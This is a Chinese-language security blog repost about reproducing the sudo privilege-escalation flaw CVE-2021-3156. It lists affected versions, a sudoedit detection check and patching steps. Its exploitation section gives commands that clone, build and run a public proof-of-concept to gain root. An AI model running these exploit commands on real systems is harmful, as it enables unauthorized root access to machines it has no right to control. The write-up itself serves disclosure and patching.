Linux sudo权限提升漏洞复现(CVE-2021-3156)
2021-02-02 11:13:27 Author: mp.weixin.qq.com(查看原文) 阅读量:197 收藏


文章来源:Bypass

2021年01月27日,RedHat官方发布了sudo 缓冲区/栈溢出漏洞的风险通告,普通用户可以通过利用此漏洞,而无需进行身份验证,成功获取root权限。

据报道这个漏洞已存在十年了,大部分的linux系统都存在这个sudo漏洞。站在攻击方的角度,这就是sudo提权的新姿势;站在防守方的角度,这可能是近期最需要去重视的漏洞了。


漏洞编号:CVE-2021-3156

漏洞级别:高危

受影响版本:

sudo: 1.8.2 - 1.8.31p2sudo: 1.9.0 - 1.9.5p1

检测方法:

以非root用户登录系统,并运行如下命令:

sudoedit -s /

- 如果响应一个以sudoedit:开头的报错,那么表明存在漏洞。

- 如果响应一个以usage:开头的报错,那么表明补丁已经生效。

漏洞利用:

git clone https://github.com/blasty/CVE-2021-3156.gitcd CVE-2021-3156make./sudo-hax-me-a-sandwich <target_number>

Kali Linux测试:

ubuntu-20.04.1 测试:

修复建议:

方式1、CentOS软件更新命令:

sudo yum -y update sudo

方式2、下载软件包安装,Sudo 1.9.5p2或更新版本。

sudo软件包下载地址:

https://www.sudo.ws/dist/

推荐文章++++

*开源堡垒机JumpServer远程命令执行漏洞复现

*CVE-2021-3019:Lanproxy任意文件读取漏洞复现

*CVE-2020-17518&17519:Flink两个漏洞复现


文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjE3ODU3MQ==&mid=2650502893&idx=3&sn=752f003aa940d4dcf4d9947c9811def2&chksm=83ba1309b4cd9a1fc9cb7031859e72ca80be75412cd6ddfd26ebaad4e70687c3882873a38654#rd
如有侵权请联系:admin#unsafe.sh